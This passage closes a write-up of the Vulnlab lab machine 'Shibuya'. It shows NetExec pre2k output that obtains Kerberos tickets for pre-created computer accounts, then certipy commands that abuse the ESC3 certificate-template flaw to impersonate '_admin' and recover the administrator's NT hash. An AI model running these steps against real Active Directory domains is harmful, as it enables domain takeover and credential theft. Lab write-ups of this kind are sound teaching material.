PRE2K       shibuya.vl      389    AWSJPDC0522      Pre-created computer account: RED$
PRE2K       shibuya.vl      389    AWSJPDC0522      Pre-created computer account: PURPLE$
PRE2K       shibuya.vl      389    AWSJPDC0522      [+] Found 2 pre-created computer accounts. Saved to /home/serio/.nxc/modules/pre2k/shibuya.vl/precreated_computers.txt
PRE2K       shibuya.vl      389    AWSJPDC0522      [+] Successfully obtained TGT for red@shibuya.vl
PRE2K       shibuya.vl      389    AWSJPDC0522      [+] Successfully obtained TGT for purple@shibuya.vl
PRE2K       shibuya.vl      389    AWSJPDC0522      [+] Successfully obtained TGT for 2 pre-created computer accounts. Saved to /home/serio/.nxc/modules/pre2k/ccache

Exploiting ESC3

I don’t think I covered how to exploit ESC3 in my blog, so this is a great opportunity to demonstrate it

$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -target-ip 10.10.106.81 -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'nigel.mills.pfx'

$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -ca shibuya-AWSJPDC0522-CA -target-ip 10.10.106.81 -template User -on-behalf-of _admin -pfx nigel.mills.pfx -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN '_admin@shibuya.vl'
[*] Certificate object SID is 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Saved certificate and private key to '_admin.pfx'

$ proxychains4 -q certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.10.106.81
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

That concludes this machine. I hope you learned something new! 🐱

Shibuya - Vulnlab